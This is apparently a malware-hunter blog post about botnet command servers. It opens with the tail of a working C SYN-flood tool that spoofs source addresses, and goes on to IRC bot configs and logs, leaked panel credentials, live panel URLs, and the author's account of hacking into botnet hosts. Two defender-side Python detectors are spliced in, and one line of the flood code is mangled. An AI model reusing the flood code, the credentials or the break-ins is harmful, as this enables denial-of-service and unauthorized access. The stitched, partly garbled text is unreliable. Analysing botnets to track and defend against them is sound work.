struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
struct sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_port = htons(floodport);
sin.sin_addr.s_addr = inet_addr(td);
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
if(s < 0){
fprintf(stderr, "Could not open raw socket.\n");
exit(-1);
}
memset(datagram, 0, MAX_PACKET_SIZE);
setup_ip_header(iph);
setup_tcp_header(tcph);
tcph->dest = htons(floodport);
iph->daddr = sin.sin_addr.s_addr;
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
int tmp = 1;
const int *val = &tmp;
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
exit(-1);
}
init_rand(time(NULL));
register unsigned int i;
i = 0;
while(1){
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
tcph->seq = rand_cmwc() & 0xFFFF;
tcph->source = htons(rand_cmwc() & 0xFFFF);
tcph->check = 0;
tcph->check = tcpcsum(iph, tcph);
pps++;
if(i >= limiter)
{
i = 0;
usleep(sleeptime);
}
i++;
}
}
int main(int argc, char *argv[ ])
{
if(argc < 6){
fprintf(stderr, "Invalid parameters!\n");
fprintf(stdout, "Usage: %s <target ip> <port to be flooded> <number of threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
exit(-1);
}
fprintf(stdout, "Setting up Sockets...\n");
int num_threads = atoi(argv[3]);
floodport = atoi(argv[2]);
int maxpps = atoi(argv[4]);
limiter = 0;
pps = 0;
pthread_t thread[num_threads];
int multiplier = 20;
int i;
for(i = 0;i<num_threads argv="" flood...="" flood="" for="" fprintf="" i="0;i<(atoi(argv[5])*multiplier);i++)" if="" multiplier="" n="" null="" pps="" pthread_create="" stdout="" tarting="" thread="" usleep="" void=""> maxpps)
{
if(1 > limiter)
{
sleeptime+=100;
} else {
limiter--;
}
} else {
limiter++;
if(sleeptime > 25)
{
sleeptime-=25;
} else {
sleeptime = 0;
}
}
pps = 0;
}
return 0;
}
</code></pre>
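A defender-side fingerprint for what this script puts on the wire, as an added example (my own code, not part of the post or of the script): on the Linux <code>struct tcphdr</code> bitfield layout <code>res2</code> is the two high bits of the TCP flags byte, so <code>res2 = 3</code> sets CWR+ECE on every SYN (stock ESSYN's <code>res2 = 1</code> sets only ECE); <code>htonl(65535)</code> stored into the 16-bit <code>window</code> field leaves it 0 on a little-endian host; and the loop writes <code>rand_cmwc() &amp; 0xFFFF</code> into <code>seq</code> without <code>htonl</code>, so the low 16 bits of the sequence number on the wire are zero. The header parser, tag names and the constructed sample packets are my assumptions, not anything from the post.

```python
import struct
from dataclasses import dataclass
from typing import Set

# TCP flag bits, low byte of the data-offset/flags word (CWR and ECE are the
# two bits the Linux struct tcphdr bitfield calls res2).
FIN, SYN, RST, PSH, ACK, URG, ECE, CWR = (1 << i for i in range(8))


@dataclass
class TcpHeader:
    ttl: int
    src: str
    dst: str
    sport: int
    dport: int
    seq: int
    doff: int     # TCP header length in 32-bit words; 5 means no options
    flags: int
    window: int


def parse_ipv4_tcp(raw: bytes) -> TcpHeader:
    """Parse the IPv4 and TCP headers at the start of a raw datagram."""
    if len(raw) < 40:
        raise ValueError("shorter than a minimal IPv4+TCP header pair")
    ver_ihl, _tos, _tlen, _ipid, _frag, ttl, proto, _csum, saddr, daddr = \
        struct.unpack("!BBHHHBBH4s4s", raw[:20])
    if ver_ihl >> 4 != 4 or proto != 6:
        raise ValueError("not an IPv4/TCP datagram")
    ihl = (ver_ihl & 0x0F) * 4
    if len(raw) < ihl + 20:
        raise ValueError("truncated TCP header")
    sport, dport, seq, _ack, off_flags, window, _tcsum, _urg = \
        struct.unpack("!HHIIHHHH", raw[ihl:ihl + 20])
    return TcpHeader(ttl, ".".join(map(str, saddr)), ".".join(map(str, daddr)),
                     sport, dport, seq, off_flags >> 12, off_flags & 0xFF, window)


def essyn_artefacts(p: TcpHeader) -> Set[str]:
    """Tags for the artefacts setup_tcp_header()/flood() leave on every SYN.

    Assumes a little-endian sender (assumption: the script's usual host), so
    the 32-bit htonl() results truncate and the unconverted seq lands low bytes first.
    """
    tags = set()
    if not (p.flags & SYN) or p.flags & ACK:
        return tags                  # only bare SYNs are of interest here
    ecn = p.flags & (ECE | CWR)
    if ecn == (ECE | CWR):
        tags.add("syn-cwr-ece")      # res2 = 3: the "DOMINATE" edit
    elif ecn == ECE:
        tags.add("syn-ece")          # res2 = 1: stock ESSYN
    if p.window == 0:
        tags.add("window-zero")      # htonl(65535) truncated into the 16-bit window
    if p.doff == 5:
        tags.add("no-options")       # doff = 5, no MSS/SACK/timestamp options
    if p.ttl == 255:
        tags.add("ttl-255")          # iph->ttl = MAXTTL
    if (p.seq & 0xFFFF) == 0:
        tags.add("seq-low16-zero")   # rand_cmwc() & 0xFFFF stored without htonl
    return tags


def is_essyn_like(p: TcpHeader, min_tags: int = 3) -> bool:
    """A bare SYN showing several artefacts at once is worth alerting on."""
    return len(essyn_artefacts(p)) >= min_tags


def build_sample(flags: int, window: int, ttl: int, seq: int,
                 src: str = "10.0.0.1", dst: str = "10.0.0.2") -> bytes:
    """Constructed sample datagram for feeding the parser; checksums left zero."""
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 0, 0, ttl, 6, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    tcp = struct.pack("!HHIIHHHH", 40000, 80, seq, 0, (5 << 12) | flags, window, 0, 0)
    return ip + tcp


if __name__ == "__main__":
    for name, pkt in (("dominate", build_sample(SYN | ECE | CWR, 0, 255, 0xBEEF0000)),
                      ("normal", build_sample(SYN, 64240, 64, 0x12345678))):
        hdr = parse_ipv4_tcp(pkt)
        print(name, sorted(essyn_artefacts(hdr)), is_essyn_like(hdr))
```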
<br />
<br />
pBot Skidd - 93.158.200.94 - IRC (2016-11-13)<br />
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">
// users
9/tcp open irc Unreal ircd
| irc-info:
| server: irc.MoneyZ.gov.GoV
| version: Unreal3.2.10.2. irc.MoneyZ.gov.GoV
| servers: 1
| chans: 2
| users: 246
| lservers: 0
| lusers: 246
// config
class pBot
{
var $config = array("server"=>"93.158.200.94", "port"=>"9", "key"=>"", "prefix"=>"botID", "maxrand"=>"8", "chan"=>"#-|Bots", "trigger"=>"", "password"=>"", "auth"=>"MoneyZ.gov");
var $users = array();
function start() {
while(true)
{
</code></pre>
Bot - l.lolole.net - IRC (2016-11-12)<br />
DNS : l.lolole.net<br />
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">
<< NOTICE AUTH :*** Looking up your hostname...
<< NOTICE AUTH :*** Found your hostname
>> USER dk dk dk dk
>> NICK dkacoxfdb
<< 001 dkacoxfdb
<< 002 dkacoxfdb : M0dded by uNkn0wn Crew
<< 003 dkacoxfdb
<< 004 dkacoxfdb : www.uNkn0wn.eu - iD@uNkn0wn.eu
<< 005 dkacoxfdb
<< 005 dkacoxfdb
<< 005 dkacoxfdb
<< 422 dkacoxfdb :MOTD File is missing
<< MODE dkacoxfdb :+iwG
>> JOIN #k
<< JOIN :#k
>> PING :E.tk
>> PONG :E.tk
</code></pre><br />
<br />
<a href="https://www.virustotal.com/en/file/7fb99af8a9403c406bc0883a9ae0f0d11d46d73e4ce5a9462d22e9b6ede25749/analysis/" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;" target="_blank"><img alt="test" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGjDIqIhUe5O4gSb8xmgunDE92zPt6tT3XSYCpc2OStdN6KX9E83l7jf6jvv-O6mBpLrGpd3r8N1yEWkyOAaZ_LW4bFKk58d4mfHruqsBDXP-ptcGKjHU3nY7u6b2MzNQE0Y_qCD477mW3/s250/vt.PNG" /></a><a href="https://malwr.com/analysis/YThlNzM5N2JlNjU1NGIwNjg0ZWY3Y2YwYzgwNTcxYWI/share/e34eba54ecbb465a9c40c221949ac034"><img alt="https://malwr.com/analysis/YThlNzM5N2JlNjU1NGIwNjg0ZWY3Y2YwYzgwNTcxYWI/share/e34eba54ecbb465a9c40c221949ac034" border="0" height="30" src="https://malwr.com/static/graphic/malwr.png" width="100" /></a>
Zbot - 151.236.58.229 - Owned (2015-03-14)<br />
Here are 2 panels installed on the same host; the host is hijacked for sure,<br />
and the owner was so nice to leave the root user without a password. Same thing for the ftp: it uses the default xampp user and pass for nix. Thanks for that btw lol. Samples are attached at the end, password is "infected".<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjL4_6Y7zoQ-C3NpFEZYJPsehIor_7vAiEHlNUjG8-axuQbtRnRKeDBXctnWzQ86J09ofvg0xTSfj97fkPpjMjHL6-Y7bPf-cOIZpgob2I3OpGSSurKnHY1xFKN5fFfwcv-De_lC0zTANk/s1600/1.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjL4_6Y7zoQ-C3NpFEZYJPsehIor_7vAiEHlNUjG8-axuQbtRnRKeDBXctnWzQ86J09ofvg0xTSfj97fkPpjMjHL6-Y7bPf-cOIZpgob2I3OpGSSurKnHY1xFKN5fFfwcv-De_lC0zTANk/s320/1.png" /></a><br />
<pre class="php" name="code">user : admin
pass : badoo123
</pre><br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisHOYc-faRlqlZphnjMZxSPSQK5l-Xp7hUBNiFr8-P-FHbjlcRl7txW989in-v2v3TG6whrtClLQ5UUzuUcCsifPedyUToFbAExsO-M82rV_srkqPNJWWCoJzXnqX6EUS6gARL_uwr0k8/s1600/2.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisHOYc-faRlqlZphnjMZxSPSQK5l-Xp7hUBNiFr8-P-FHbjlcRl7txW989in-v2v3TG6whrtClLQ5UUzuUcCsifPedyUToFbAExsO-M82rV_srkqPNJWWCoJzXnqX6EUS6gARL_uwr0k8/s320/2.png" /></a><br />
<pre class="php" name="code">user : admin
pass : badoo123
</pre><br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTHsHTWjeF33CPiNUreypHsAdl0NDY8b33Ek_I_8INX873VjltxlAPelzsC7F6pgaljFt8nYQwfIratF-4MISb4WQ_ZNYQcTRv7hVXc-hFGtr3InaIsCqYoyRTNgZsuwBLbV03JXpTavw/s1600/3.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTHsHTWjeF33CPiNUreypHsAdl0NDY8b33Ek_I_8INX873VjltxlAPelzsC7F6pgaljFt8nYQwfIratF-4MISb4WQ_ZNYQcTRv7hVXc-hFGtr3InaIsCqYoyRTNgZsuwBLbV03JXpTavw/s320/3.png" /></a><br />
<br />
<pre class="php" name="code">hxxp://www.filehost.ro/31418144/infected_rar/
pass : infected
</pre>
Blue Botnet - HTTP Botnet (2015-02-15)<br />
Found a sample in the wild.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhM_829_V12JAtOLwbkxSBdjBJL6r37BdPwcNFlzRjBKC9bvtlDLo3WcCYN5GHy2oZPK3wlMPCV3PiDkJMoJNMHNMEUL8Js9eDAgT24piEJYlyWvmn6SxxiG6gEePocEP5wcbJGkG4laOA/s1600/1.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhM_829_V12JAtOLwbkxSBdjBJL6r37BdPwcNFlzRjBKC9bvtlDLo3WcCYN5GHy2oZPK3wlMPCV3PiDkJMoJNMHNMEUL8Js9eDAgT24piEJYlyWvmn6SxxiG6gEePocEP5wcbJGkG4laOA/s320/1.png" /></a><br />
<br />
The sample was <b>uncrypted</b> as well, and it's coded in .<b>NET C#</b>.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi49wS63PMI5i2HfceanTJHaYgvla2U3WuoaVUIzv0bsKZGtYcmolTEOuvHw_ooeOjiN8S6wkCtTTYbDIOCwUHrd_FyDp7cq2fIUwv4lGd6rbTGXrL2FcscGto0HdQYaeKcjJbSWRUmkLQ/s1600/vt.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi49wS63PMI5i2HfceanTJHaYgvla2U3WuoaVUIzv0bsKZGtYcmolTEOuvHw_ooeOjiN8S6wkCtTTYbDIOCwUHrd_FyDp7cq2fIUwv4lGd6rbTGXrL2FcscGto0HdQYaeKcjJbSWRUmkLQ/s320/vt.png" /></a><br />
<br />
Let's also take a look inside (.NET):<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3RPGaUdLJeAP7zYz_VQ8fqEPqy_Ftm3Hcq4OIY831Ss4zNbb5TMPAu4iNotvKSkTQAH1urNXTIzAgcUq00a5mLZDqgqeqwXWTWC2BugbWyCrQXYw2UMbFz7xsEG0yMLiGjwZwYjixySY/s1600/2.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3RPGaUdLJeAP7zYz_VQ8fqEPqy_Ftm3Hcq4OIY831Ss4zNbb5TMPAu4iNotvKSkTQAH1urNXTIzAgcUq00a5mLZDqgqeqwXWTWC2BugbWyCrQXYw2UMbFz7xsEG0yMLiGjwZwYjixySY/s320/2.png" /></a><br />
<br />
Traced the bot back and found the host, hacked it, got his <b>panel.rar</b> lol, so the following pictures are just a demo<br />
on my local net..<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLL6izPi2Q2TJ9t2MD-6BJ2aEA7ONR_wZtis3z1wq_v28r1jDFmmjODiY0Hj38MyABqCMiPJqO5MV4D0PZXRiJRMyx8g1GnnbqsHqRs6pCtKuHj3m7sKSlj-CpchcArEvVA3SxAPnheGI/s1600/3.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLL6izPi2Q2TJ9t2MD-6BJ2aEA7ONR_wZtis3z1wq_v28r1jDFmmjODiY0Hj38MyABqCMiPJqO5MV4D0PZXRiJRMyx8g1GnnbqsHqRs6pCtKuHj3m7sKSlj-CpchcArEvVA3SxAPnheGI/s320/3.png" /></a><br />
<br />
<pre class="php" name="code">// index.php
<?php
error_reporting(E_ERROR | E_PARSE);
// no hash file yet: first run, the operator is sent to register.php
if (file_exists("phash") == false) {
    header("Location: register.php");
} else {
    // the stored value is md5("randomsalt" . cookie) of the panel password
    $filename = "phash";
    $fp = fopen($filename, "r");
    $content = fread($fp, filesize($filename));
    fclose($fp);
    $storedPassHash = $content;
    // authentication rests on the client-supplied 'phash' cookie, hashed with a
    // fixed salt and loosely compared (!=) against the stored hash
    $passHash = $_COOKIE['phash'];
    if (md5("randomsalt".$passHash) != $storedPassHash) {
        header("Location: login.php");
    }
}
</pre><br />
Different DDoS methods are used: HTTP proxy flood, WordPress pingback (xmlrpc), TCP, etc.<br />
Looks like <b><a href="https://github.com/huggye/HyperBeamEngine/blob/master/DoSAttack.cs">HyperBeamEngine</a></b>.<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2GC6DmxZXWwrYksWNW5OC6deHthvbbd10EOJ_mSbwiwk1XOCFF-lft_svQXsmDbYehlweXMNX_abRsAY1KlkG4xfj2QFzFosIgvklXoskYjI0pBny600BrlmxX4enjca_W5BbUqcVPXU/s1600/flood.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2GC6DmxZXWwrYksWNW5OC6deHthvbbd10EOJ_mSbwiwk1XOCFF-lft_svQXsmDbYehlweXMNX_abRsAY1KlkG4xfj2QFzFosIgvklXoskYjI0pBny600BrlmxX4enjca_W5BbUqcVPXU/s320/flood.png" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJuwp4TCZ7CBF5O8Y3GL9lJ_2vaMuQONYp6e9A6HnWHb_d61v-FcmYhPxZpKTtj8L4_idOK_AYEcGgogA1hQ299NsXw3ssvdVe45-DVdO5DCxpnbRUICFlLP-PqxR1Txj3b2ffpvNr0JY/s1600/3-1.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJuwp4TCZ7CBF5O8Y3GL9lJ_2vaMuQONYp6e9A6HnWHb_d61v-FcmYhPxZpKTtj8L4_idOK_AYEcGgogA1hQ299NsXw3ssvdVe45-DVdO5DCxpnbRUICFlLP-PqxR1Txj3b2ffpvNr0JY/s320/3-1.png" /></a><br />
A demo of the <b>TCP flood</b>; the bot requests:<br />
botserver/panel<b>/target.ip</b><br />
botserver/panel<b>/target.method</b><br />
botserver/panel<b>/target.port</b><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-4WM9mwy43k_f6rae2Oj-mVcVI_tNx92i3vdj7lW6Y8_fI17Vet1Sqr2tv3jy0FZ1GLNlGGTtI_jkhyphenhyphenmR2dSQ3PK0xB6xwoejQQ3yRupO3GmxxKoH0jo1uShpcYjX49T2eEJuuf3zig4/s1600/tcp.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-4WM9mwy43k_f6rae2Oj-mVcVI_tNx92i3vdj7lW6Y8_fI17Vet1Sqr2tv3jy0FZ1GLNlGGTtI_jkhyphenhyphenmR2dSQ3PK0xB6xwoejQQ3yRupO3GmxxKoH0jo1uShpcYjX49T2eEJuuf3zig4/s320/tcp.png" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaWOvLXil-NYXY8f41qyH0Gh8yteyet4cbro_ZdZ9_lC8JsQhFzwkxhSwfawi9dhHkvfDM_U-HGd7qQ0-m709yvJA9DNvCS6Whpoda9UKcnF7ERaZT89hYTiQrcEx_4_HDtN_R-eLAz38/s1600/9.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaWOvLXil-NYXY8f41qyH0Gh8yteyet4cbro_ZdZ9_lC8JsQhFzwkxhSwfawi9dhHkvfDM_U-HGd7qQ0-m709yvJA9DNvCS6Whpoda9UKcnF7ERaZT89hYTiQrcEx_4_HDtN_R-eLAz38/s320/9.png" /></a><br />
<br />
<b>HTTP Flood</b>: the HTTP proxies from the settings are saved at "botserver/panel/<b>proxy</b>"; that's where the bot reads them from<br />
if target.method is HTTPFLOOD.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMUpuWcqjAmiH6D0TuYsTqd-JBHB0IrQG1p05sU2lglJxxBlDiqP53dk3YbpCLHR_I1F3h5XxdWyFQ6vxemO2WG_vpLssrcrHbP9nQySxgeyGoylERbCliO5iesZfKTVVpVrgyFdQT2Ic/s1600/4.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMUpuWcqjAmiH6D0TuYsTqd-JBHB0IrQG1p05sU2lglJxxBlDiqP53dk3YbpCLHR_I1F3h5XxdWyFQ6vxemO2WG_vpLssrcrHbP9nQySxgeyGoylERbCliO5iesZfKTVVpVrgyFdQT2Ic/s320/4.png" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1U6f3yGidmXLNXsfR8R_MkYYLIxgSE0HAvMGiUE-Yu2dCmRpSGNOfJODNctgBu4gJoypouKtS1rO2Ny2jzR2RkeLUp5wtU-8CB-kFK7m2EblulctrRyaIjBAjvsLUf4VsHkEFbaC4e4s/s1600/12.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1U6f3yGidmXLNXsfR8R_MkYYLIxgSE0HAvMGiUE-Yu2dCmRpSGNOfJODNctgBu4gJoypouKtS1rO2Ny2jzR2RkeLUp5wtU-8CB-kFK7m2EblulctrRyaIjBAjvsLUf4VsHkEFbaC4e4s/s320/12.png" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGoH2uTqDUaszyGbV1uipU8VHnmbLBSy4Y5UZffybFs33ygtk0EsXlTUMy6t1C6sjnvWpZGFzMkiDt-N9OSr0kCj2i-U3a5G3CwKJ93u6snB8xTObIQuNSWPa3GTYp4d9fefkU3v48dWY/s1600/7.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGoH2uTqDUaszyGbV1uipU8VHnmbLBSy4Y5UZffybFs33ygtk0EsXlTUMy6t1C6sjnvWpZGFzMkiDt-N9OSr0kCj2i-U3a5G3CwKJ93u6snB8xTObIQuNSWPa3GTYp4d9fefkU3v48dWY/s320/7.png" /></a><br />
<br />
WordPress pingback, or <b>PRESS</b> as he calls it: the same as the HTTPFLOOD, but here the file is saved under<br />
botserver/panel/<b>blog</b>; that's the file the hosts are added to in the settings.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8-LnanyKy8tnZ0yJ72jwhu-pCFhWEuG7oVTlLmZJYdTj2ThZQjEj8PEOXSjt66K2yIJnrjsarf1H-XNSRCx5JxcpkE6ACATlFYd-OhYTof8HZxlNE3ZFrRlycYUl5Xg2IZRq5rJ4ICjY/s1600/13.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8-LnanyKy8tnZ0yJ72jwhu-pCFhWEuG7oVTlLmZJYdTj2ThZQjEj8PEOXSjt66K2yIJnrjsarf1H-XNSRCx5JxcpkE6ACATlFYd-OhYTof8HZxlNE3ZFrRlycYUl5Xg2IZRq5rJ4ICjY/s320/13.png" /></a><br />
<br />
An <b>online</b> running botnet I found is here:<br />
<pre class="html" name="code">hxxp://burimche.net/help/login.php
// all online IPs of bots
hxxp://burimche.net/help/visitors.txt
hxxp://burimche.net/help/target.ip
hxxp://burimche.net/help/target.method
hxxp://burimche.net/help/target.port
// online bots
hxxp://burimche.net/help/botlogger.php
</pre><a href="https://www.virustotal.com/en/file/ce79297e6e2b2242b49b520e373636147ba1609383ed14fcd4c2992627d8604f/analysis/1423852515/" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;" target="_blank"><img alt="test" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGjDIqIhUe5O4gSb8xmgunDE92zPt6tT3XSYCpc2OStdN6KX9E83l7jf6jvv-O6mBpLrGpd3r8N1yEWkyOAaZ_LW4bFKk58d4mfHruqsBDXP-ptcGKjHU3nY7u6b2MzNQE0Y_qCD477mW3/s250/vt.PNG" /></a><br />
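The bot's polling of target.ip, target.method and target.port plus the proxy and blog settings files is a usable network signature. Below is an added example (not the panel's or the bot's code) that flags clients pulling several of those panel files from one directory in a web-proxy log; the log line format and the cnc.example host are constructed assumptions.

```python
import re
from collections import defaultdict

# Files the Blue Botnet bot fetches from its panel directory (see the panel
# walk-through above): attack parameters, settings files and the logger pages.
BLUE_PANEL_FILES = {
    "target.ip", "target.method", "target.port",   # flood target, read on every poll
    "proxy", "blog",                                # HTTPFLOOD proxy list, PRESS blog list
    "visitors.txt", "botlogger.php",               # bot check-in / online-bot logger
}

# Constructed proxy-log format (assumption): "<timestamp> <client-ip> <method> <url>".
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)"
)


def split_url(url):
    """Return (panel base URL, file name) for a URL, ignoring any query string."""
    path = url.split("?", 1)[0]
    base, _, name = path.rpartition("/")
    return base, name


def find_polling_bots(log_lines, min_files=3):
    """Group requests by (client, panel base) and keep clients that fetched at least
    `min_files` distinct panel files from one base. A single hit on visitors.txt is
    weak evidence; a client pulling target.ip, target.method and target.port from
    the same directory is the bot's polling loop."""
    seen = defaultdict(set)
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        base, name = split_url(m["url"])
        if name in BLUE_PANEL_FILES:
            seen[(m["client"], base)].add(name)
    return {k: sorted(v) for k, v in seen.items() if len(v) >= min_files}


# Constructed sample log; cnc.example is a placeholder for the panel host.
SAMPLE_LOG = [
    "2015-02-15T07:27:00 10.0.0.5 GET http://cnc.example/help/target.ip",
    "2015-02-15T07:27:00 10.0.0.5 GET http://cnc.example/help/target.method",
    "2015-02-15T07:27:00 10.0.0.5 GET http://cnc.example/help/target.port",
    "2015-02-15T07:27:01 10.0.0.5 GET http://cnc.example/help/proxy",
    "2015-02-15T07:27:30 10.0.0.5 GET http://cnc.example/help/target.ip",
    "2015-02-15T07:28:02 10.0.0.9 GET http://www.example/blog/target.ip?x=1",  # one stray hit
    "2015-02-15T07:28:05 10.0.0.9 GET http://www.example/index.html",
    "garbage line that does not parse",
]

if __name__ == "__main__":
    for (client, base), files in find_polling_bots(SAMPLE_LOG).items():
        print(f"{client} polls {base}/ : {', '.join(files)}")
```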
Want the sample and panel? Contact me by email, for research purposes only!!bi0http://www.blogger.com/profile/14620421761593085083noreply@blogger.com4tag:blogger.com,1999:blog-2580748854525661454.post-24459649671270568612015-02-10T10:43:00.002-08:002015-02-10T10:43:31.345-08:00Zeus / Cryptlocker - skid - information@jupimail.com<br />Found an easy, modified Zeus panel; after putting a shell into it,<br />
we got the user and pass from the database. I found there was a<br />
script enabled to download and execute a file, see pic 3.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsJkX7R7AFh0DYWAyxcLQ8z51mrWPyz3axFzvZvmBR3jAtCbR__ZG9oF-Oseq_jpm5-slxLdQ8wd-7rh8lXmcJgGgcEhMeijQOld9AOa5FNSBF1KLhiLzh7-XKjTS_nSNQgl-TZdxAM0E/s1600/z2.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsJkX7R7AFh0DYWAyxcLQ8z51mrWPyz3axFzvZvmBR3jAtCbR__ZG9oF-Oseq_jpm5-slxLdQ8wd-7rh8lXmcJgGgcEhMeijQOld9AOa5FNSBF1KLhiLzh7-XKjTS_nSNQgl-TZdxAM0E/s320/z2.png" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijkvIjlMBEAzyknvpiUBao8EvPRCqWh2wXd8jadLyhaMVyxLCvv8dUhdtQq3Dpt88NQZxATUx0iuKmlNLdXqhl0n7U0Wt5HIX_Ea13SSSbqsZ0JMfN8lpknKFCek7FH_PENCksNX7GCHw/s1600/z1.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijkvIjlMBEAzyknvpiUBao8EvPRCqWh2wXd8jadLyhaMVyxLCvv8dUhdtQq3Dpt88NQZxATUx0iuKmlNLdXqhl0n7U0Wt5HIX_Ea13SSSbqsZ0JMfN8lpknKFCek7FH_PENCksNX7GCHw/s320/z1.png" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYVv-qMk8kuJqV5wCC6S6onMQnPOPxC17HIieQELC5PXqOp820u3QO-rwNLL-09869ikRWQAQQuTgKCJpCbs9ltw0k2jUP6V4WIxlVrAkiIIOje-jV2i44H3wv4BM1g-bfGyyEBTrTm1w/s1600/z3.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYVv-qMk8kuJqV5wCC6S6onMQnPOPxC17HIieQELC5PXqOp820u3QO-rwNLL-09869ikRWQAQQuTgKCJpCbs9ltw0k2jUP6V4WIxlVrAkiIIOje-jV2i44H3wv4BM1g-bfGyyEBTrTm1w/s320/z3.png" /></a><br />
<br />
VirusTotal of update.src.. this is a CryptoLocker.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8Sohg0l_boMqTtIsX_-R2Ra2yGq3OFl0l12dRJPFkuOo9StXkbKz5vgPDM7OgObM7MQMb5HBTJKRVeopTE3vJzXsmiFMUK_lRzOQrGgVGqM1TrivMhVEFRA_3E_mY-dLKS0nV8qIE-fs/s1600/z4.png" imageanchor="1" ><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8Sohg0l_boMqTtIsX_-R2Ra2yGq3OFl0l12dRJPFkuOo9StXkbKz5vgPDM7OgObM7MQMb5HBTJKRVeopTE3vJzXsmiFMUK_lRzOQrGgVGqM1TrivMhVEFRA_3E_mY-dLKS0nV8qIE-fs/s320/z4.png" /></a><br />
<br />
Also the desktop after its execution:<br />
<br />
